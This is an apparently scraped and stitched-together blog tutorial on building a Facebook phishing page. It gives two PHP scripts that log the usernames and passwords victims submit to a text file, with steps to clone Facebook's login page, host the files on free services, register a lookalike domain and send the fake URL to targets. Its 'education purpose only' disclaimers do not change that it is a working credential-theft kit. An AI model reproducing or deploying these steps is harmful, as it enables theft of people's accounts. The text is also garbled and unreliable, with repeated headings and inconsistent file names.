How To Make Phishing Site For Facebook



Hi Guys Today I’ll Tell You How To Make A Phishing Page For Facebook.
Phishing is the attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication.

  1. How To Make Facebook Phishing Site 2018
  2. How To Make A Phishing Site For Facebook
  3. How To Make A Phishing Page
  4. Phishing Sites

Go to Facebook.com Right click on the white space of the front page. Select “View Page source”. Copy the code to Notepad. Pull up Facebook.com in your browser. Then, right click on the website’s login page. You should see an option along the lines of “view source page.” Click on this option and you should be able to view. How to Make a Phisher/Fake Page For Any Website 1. First open the website in a browser for which you want to create a phishing page. Now press the Ctrl+ S to save the page. Facebook Phishing Script. Please dont use this script to hack someone's ID, I have created this script only to practice when I was learing php back in 2013. Edit doaction.php and replace YOUREMAILADDRESS with the email you want to recieve access. Upload it to a PHP supported web server. I am not recieving antything.

How will this be done? You will be able to gain access to another users facebook profile by using a method known as “phishing”

Phishing.

What is phishing and how is it done?

Phishing is the process of directing users to enter details into a fake website that look and feel like the legitimate one.

Basically all you are doing is getting your target to login to your fake login page and you will be sent their Facebook email and password.

STEP 1:Creating Phishing.php file :

1. Even if you don’t have any knowledge of php file simply copy the following script and save it as phishing.php .

:<?php
header(“Location: https://www.facebook.com/login.php&#8221;);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

STEP 2: Creating index.html page :

1. Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html

2. Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .

3. search (By pressing Ctrl+F) for : method in it and replace the highlighted part (post) with get .

4. save index.html

STEP 3: Now create a completely blank text file with name passwords.txt.

Now you have all the following three files with you :

1. phishing.php

For

2. index.html

3. passwords.txt

Step 4: Now you need to make a website.

I recommended you byethost because it is completely free hosting with free domain.

Go to: byethost.com and fill out the informations needed and click on register button.

2. Now Goto your email account that you gave and confirm your account with confirmation link.

(Note the cpanel username that you got when verified with your activation link)

3. Now Go tohttp://panel.byethost.com and Log into your account Cpanel.

Enter your cpanel username and password and login

4. Now when you are logged into your account then Go to File Manager under Files and log into it.

5. Now Click on the Public_html.

6 .Click on the Upload button and upload 3 files named phishing.php, index.html and passwords.txt

(before uploading files you need to delete all the files inside the Public_html folder)

7. After successfully uploaded 3 files click on index.html file, then your fake phishing page will open up.

You are now ready to phishing.

sent your fake login page’s URL to someone via email or chatting , when someone type their facebook email and password in your fake login page it will store to your passwords.tex file.

The Input Data (Email and Password) will look like this.

Ever heard about Phishing page and Phishing Attack? Today I’m going to show you how to create a Phishing page & How to do Phishing Attack step by step full tutorial. So, do you know

Table Of Content

  • 1 What is Phishing Page?
    • 1.3 How to make a php script?

This Tutorial is for Education Purpose only!!!

Phishing is a technique by which we create a similar web page(Phishing Page) to the original one. In this technique, we copy original website page code and do some changes to it. Then upload it to the hosting and access it from anywhere.

Here is the list of things that you will learn from this post

  • How to copy the code from the original website
  • How to do some changes in this code
  • How to make a php script
  • How to upload it to the Hosting
  • and a lot more !!!

Umm!!! Interested to read further ?? I’m sure you will like this tutorial and you want this tutorial. 😛

DON’T MISS:- web.whatsapp.com Hack Tutorial Step by Step Explanation

How to copy the code from the original website

Open a website of which Phishing page do you want then press ctrl+U to open its source code file. For ex:- I’m copying the code of Facebook.com and then I will make a facebook phishing page. Well, this is what which you want …Right!! 😛

So I’m copying the source code from Fcaebook.com by pressing ctrl+U. You can see here the source code from Facebook.com is shown here.

The only thing you have to do is to select all code and then copy this code by pressing ctrl+A and then ctrl+C and then open a notepad file and paste it there by pressing ctrl+V.

You can see here I pasted down the whole code from website to my notepad file.

How to do some changes in this code?

Now, you have to find this line by pressing ctrl+F and type this whole line there and press Enter.

How To Make Phishing Site For Facebook

action=”https://www.facebook.com/login.php?login_attempt=1&amp;lwv=110″ method=”post”


Let’s do some changes, You can see the path of Facebook is shown here. Copy this whole path and replace it with login.php and also change the method from post to get. and save this notepad file with the name fb.html.


How to make a php script?

Do you know Php Language? Well, If you don’t know anything about Php Language then no problem but in the future, I recommend you to learn this language. So, I’m giving you a PHP code which will save the username password which is entered on our fb.html page. and it also saves different username and password to a new line. When the victim enters his username and password to it then this PHP script will redirect that user to the original Facebook page.

So, here’s the Php script

<?php
header(“Location: https://www.facebook.com”);
$handle = fopen(“logs.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);


fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Just copy this script and paste it down to your notepad file and then save this file with a name hack.php

One more thing creates a blank notepad file with a logs.txt name on which victim’s usernames and password will save.

Now, you have three notepad files one is none.html and second is login.php and third is logs.txt. Just copy all files and save it to a new folder.

How to upload Facebook Phishing Page to the Hosting?

Let Understand what is Hosting and Domain. To open a website we must have a domain, hosting. So, Domain is the name of our website. For ex :- I have Hackingblogs.com This is my domain. and the location where this domain has parked this location is known as hosting.

Still Confused!! Let’s Understand with an Example, Whenever we open a new store then we have to decide two things

  • Store’s Name
  • Land/room

Similarly, For opening a website we need Domain for a website which is unique. and the second one is the land which is hosting on the Internet. Hosting and Domain are paid and some websites also provide this hosting and domain at free of cost.

How To Make Facebook Phishing Site 2018

Here’s the list of Free hosting providers website.


  • and many more…

I’m using 000webhost here. So, open this website and do sign up there. In the field of a website, name leaves it blank.

How To Make Phishing Site For Facebook

How To Make A Phishing Site For Facebook

and now you have to take a domain which looks similar to Facebook. If you don’t know about creating a similar word the same as the original one. Check my earlier post.

I’m sharing some website link which provides free domains.

How To Make A Phishing Page

You can use any of them to register a domain for free. Now, come to the hosting. You can use any of the websites. Now, the post is becoming so long so, at 29 April I will upload Its second part in which I will show you how to attach domain and hosting and also tell some tricks which nobody tells you. 🙂 So, do subscribe to the new post. Good Bye 🙂

Phishing Sites

This is the Second Part:- How to Upload a Phishing page on Hosting | Phishing Page Part 2